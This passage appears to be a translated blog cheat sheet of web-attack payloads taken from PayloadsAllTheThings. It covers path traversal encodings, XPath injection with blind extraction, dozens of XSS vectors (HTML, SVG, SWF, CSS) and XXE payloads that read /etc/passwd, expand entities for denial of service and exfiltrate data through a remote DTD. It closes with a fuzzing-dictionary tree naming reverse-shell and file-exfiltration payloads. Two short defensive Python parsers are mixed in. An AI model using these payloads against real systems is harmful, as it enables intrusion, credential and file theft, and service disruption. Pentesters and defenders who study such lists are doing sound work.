. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
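As an added defensive example (not from the original notes or PayloadsAllTheThings), a request-path canonicalizer that peels the encodings listed above (double URL encoding, %uXXXX, overlong UTF-8) before checking for traversal. The overlong handling is a simplified model of how lenient decoders behaved and only covers the common forms above; it is meant for flagging requests, not for rewriting paths.

```python
import re
from urllib.parse import unquote_to_bytes

# Look-alike code points that the %uXXXX payloads above decode to (constructed table).
_LOOKALIKES = str.maketrans({"\u2215": "/", "\u2216": "\\", "\uff0e": ".",
                             "\uff0f": "/", "\uff3c": "\\"})
_U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")     # non-standard %u002e style


def _lenient_utf8(raw: bytes) -> str:
    """Simplified model of a lenient decoder: an overlong 0xC0/0xE0 lead byte is
    dropped, 0x80 padding after it is skipped, and the next byte keeps only its
    low 6 bits if it is a continuation byte (C0 AE -> '.', E0 80 AF -> '/') or
    is taken as-is otherwise (C0 5C -> '\\'). Genuine non-ASCII text may be
    mangled by this, but it can never collapse into a clean '..' segment."""
    out, i = bytearray(), 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xE0):
            i += 1
            while i < len(raw) and raw[i] == 0x80:
                i += 1
            if i < len(raw):
                nxt = raw[i]
                out.append(nxt & 0x3F if nxt >= 0x80 else nxt)
                i += 1
        else:
            out.append(b)
            i += 1
    return out.decode("utf-8", "replace")


def canonicalize(path: str, rounds: int = 3) -> str:
    """Peel up to `rounds` layers of %XX / %uXXXX encoding, then unify separators."""
    s = path
    for _ in range(rounds):
        prev = s
        s = _U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)
        s = _lenient_utf8(unquote_to_bytes(s)).translate(_LOOKALIKES)
        if s == prev:            # nothing left to decode
            break
    return re.sub(r"/+", "/", s.replace("\\", "/"))


def is_traversal(path: str) -> bool:
    """Flag any canonical segment made only of two or more dots; that covers '..'
    as well as the '..././' and '...\\.\\' filter-stripping bypasses above."""
    return any(re.fullmatch(r"\.{2,}", seg) for seg in canonicalize(path).split("/"))
```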

19. File Upload

Exploit

Only the exploitable angles are listed here; they are not each detailed individually.
1. Blacklist bypass
2. Double file upload
3. Arrays
4. Modifying special fields
5. Truncation
6. Parser vulnerabilities
7. ffmpeg
8. flash
9. imagemagic
10. zip symlink
11. htaccess
12. iis
13. ssi
14. pdf
15. python
16. csp
17. xss
18. Oversized-file DoS
19. xxe
20. URL redirect

20. XPath Injection

XPath query:
string(//user[name/text()='" +username+ "' and password/text()='" +password+ "']/account/text())
Payloads:
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
Blind injection:
1. Get the length
and string-length(account)=SIZE_INT
2. Extract the content
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

21. XSS

Basic

<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)>
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
javascript: protocol
javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
java%0ascript:alert(1) - LF (\n)
java%09script:alert(1) - tab (\t)
java%0dscript:alert(1) - CR (\r)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) - escape
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)
data: protocol
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

XML file

// Use CDATA so the payload is not parsed as XML
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<info>
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://www.baidu.com</value>
</url>
</info>
</body>
</html>

SVG file

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>

SWF

flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
phpmyadmin/js/canvg/flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//

CSS

<!DOCTYPE html>
<html>
<head>
<style>
div {
background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
background-color: #cccccc;
}
</style>
</head>
<body>
<div>lol</div>
</body>
</html>

22. XXE

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Base64
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
PHP wrapper
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >
]>
<foo>&xxe;</foo>
DOS
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
Blind XXE
Send the payload:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
File hosted on the remote host:
http://127.0.0.1/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
XXE in File
DOCX/XLSX/PPTX
ODT/ODG/ODP/ODS
SVG
XML
PDF (experimental)
JPG (experimental)
GIF (experimental)
Exploitation tool: https://github.com/BuffaloWill/oxml_xxe
Online generator: https://buer.haus/xxegen/
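Added defensive example, not from the original notes or any tool above: a stdlib-only expat parser that refuses any DOCTYPE. Every payload in this section (SYSTEM file entity, PHP wrapper, parameter-entity exfiltration, the a0..a4 expansion) has to declare its entities in a DTD, so rejecting the DOCTYPE stops them before anything is fetched or expanded. The sample documents are constructed single-line versions of the payloads above.

```python
import xml.parsers.expat as expat


class DtdRejected(ValueError):
    """Raised when the document declares a DTD, the only place entities can live."""


def parse_no_dtd(xml_text: str) -> dict:
    """Parse with the stdlib expat parser but refuse any DOCTYPE. The DOCTYPE
    handler fires before a single entity is declared, so the SYSTEM entity,
    the parameter-entity exfil and the exponential expansion above are all
    rejected unexpanded. Returns a {tag: text} map of the element content."""
    parser = expat.ParserCreate()
    text, stack = {}, []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE {name!r} not allowed")

    def reject_external(context, base, sysid, pubid):
        raise DtdRejected(f"external entity {sysid!r} not allowed")

    def collect(data):
        if stack:
            text[stack[-1]] = text.get(stack[-1], "") + data

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external   # never fetch, defence in depth
    parser.StartElementHandler = lambda tag, attrs: stack.append(tag)
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = collect
    parser.Parse(xml_text, True)
    return text


def triage(xml_text: str) -> str:
    """'rejected' for DTD-bearing input, 'malformed' for broken XML, else 'ok'."""
    try:
        parse_no_dtd(xml_text)
    except DtdRejected:
        return "rejected"
    except expat.ExpatError:
        return "malformed"
    return "ok"


# Constructed samples: the file-entity and expansion payloads from above in
# single-line form, plus a harmless document of the shape an API would expect.
FILE_ENTITY = ('<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
               '<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>')
EXPANSION = ('<!DOCTYPE data [<!ENTITY a0 "dos"><!ENTITY a1 "&a0;&a0;&a0;&a0;">'
             '<!ENTITY a2 "&a1;&a1;&a1;&a1;">]><data>&a2;</data>')
BENIGN = '<order><id>42</id><note>no DTD here</note></order>'
```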

If you are interested, you can build a vulnerability fuzzing dictionary along these lines; it is very useful.

w2n1ck@w2n1ck  ~/Desktop/vul_fuzz  tree -FC
.
├── api.txt
├── command_exec.txt
├── crlf.txt
├── dicc.txt
├── directory_traversal.txt
├── ldap_attributes.txt
├── lfi.txt
├── nosql.txt
├── open_redirect.txt
├── php.txt
├── sqli/
│   ├── sqli.txt
│   ├── sqli_error.txt
│   ├── sqli_mssql.txt
│   ├── sqli_mssql_insert.txt
│   ├── sqli_mssql_where.txt
│   ├── sqli_mysql.txt
│   ├── sqli_mysql_insert.txt
│   ├── sqli_mysql_order_by.txt
│   ├── sqli_mysql_where.txt
│   ├── sqli_oracle.txt
│   ├── sqli_postgres.txt
│   ├── sqli_time.txt
│   └── sqli_union.txt
├── ssi.txt
├── upload/
│   ├── ffmpeg/
│   │   ├── gen_avi_bypass.py
│   │   ├── gen_xbin_avi.py
│   │   ├── read_passwd.avi
│   │   ├── read_passwd_bypass.mp4
│   │   ├── read_shadow.avi
│   │   └── read_shadow_bypass.mp4
│   ├── flash/
│   │   ├── xss.swf
│   │   └── xssproject.swf
│   ├── htaccess/
│   │   └── 1.jpg
│   ├── iis/
│   │   ├── index.stm
│   │   └── web.config
│   ├── imagemagic/
│   │   ├── centos_id.jpg
│   │   ├── payload_imageover_file_exfiltration_pangu_wrapper.jpg
│   │   ├── payload_imageover_file_exfiltration_text_wrapper.jpg
│   │   ├── payload_imageover_reverse_shell_devtcp.jpg
│   │   ├── payload_imageover_reverse_shell_netcat_fifo.png
│   │   ├── payload_imageover_wget.gif
│   │   ├── payload_url_bind_shell_nc.mvg
│   │   ├── payload_url_curl.png
│   │   ├── payload_url_portscan.jpg
│   │   ├── payload_url_remote_connection.mvg
│   │   ├── payload_url_reverse_shell_bash.mvg
│   │   ├── payload_url_touch.jpg
│   │   ├── payload_xml_reverse_shell_nctraditional.xml
│   │   ├── payload_xml_reverse_shell_netcat_encoded.xml
│   │   ├── ubuntu_id.jpg
│   │   └── ubuntu_shell.jpg
│   ├── pdf/
│   │   ├── poc.js
│   │   ├── poc.py
│   │   └── result.pdf
│   ├── php_ext/
│   │   ├── phpinfo.jpg.php
│   │   ├── phpinfo.php3
│   │   ├── phpinfo.php4
│   │   ├── phpinfo.php5
│   │   ├── phpinfo.php7
│   │   ├── phpinfo.phpt
│   │   ├── phpinfo.pht
│   │   └── phpinfo.phtml
│   ├── picture/
│   │   ├── Build_image_to_LFI.py
│   │   ├── php_exif_data.png
│   │   ├── phpinfo-metadata.gif
│   │   ├── phpinfo-metadata.jpg
│   │   ├── shell_cinema.gif
│   │   ├── shell_fr.gif
│   │   └── shell_problem.gif
│   ├── python/
│   │   ├── python-admin-__init__.py.zip
│   │   ├── python-conf-__init__.py.zip
│   │   ├── python-config-__init__.py.zip
│   │   ├── python-controllers-__init__.py.zip
│   │   ├── python-generate-init.py
│   │   ├── python-login-__init__.py.zip
│   │   ├── python-models-__init__.py.zip
│   │   ├── python-modules-__init__.py.zip
│   │   ├── python-scripts-__init__.py.zip
│   │   ├── python-settings-__init__.py.zip
│   │   ├── python-tests-__init__.py.zip
│   │   ├── python-urls-__init__.py.zip
│   │   ├── python-utils-__init__.py.zip
│   │   └── python-view-__init__.py.zip
│   ├── ssi/
│   │   ├── exec.shtml
│   │   └── include.shtml
│   └── zip_link/
│       ├── etc_passwd.zip
│       ├── generate.sh
│       └── passwd
├── web_cache_deception_attack_headers.txt
├── xpath_injection.txt
├── xss/
│   ├── "><img\ src=x\ onerror=alert(document.cookie);.jpg
│   ├── "><svg\ onload=alert(1)>
│   ├── xss_comment_exif_metadata_double_quote.png
│   ├── xss_flashfile.swf
│   ├── xss_intruders.txt
│   ├── xss_payloads.txt
│   ├── xss_svg.svg
│   ├── xss_svg1.svg
│   ├── xss_svg2.svg
│   ├── xss_svg3.svg
│   ├── xss_swf.swf
│   ├── xss_swf_fuzz.txt
│   ├── xss_xml.xml
│   └── xss_xml_cheatsheet.html
└── xxe/
    ├── xml-attacks.txt
    ├── xxe_etc_passwd.xml
    ├── xxe_fuzzing.txt
    └── xxe_php_wrapper.xml

Original repository: https://github.com/swisskyrepo/PayloadsAllTheThings

Spare a coin, good sir!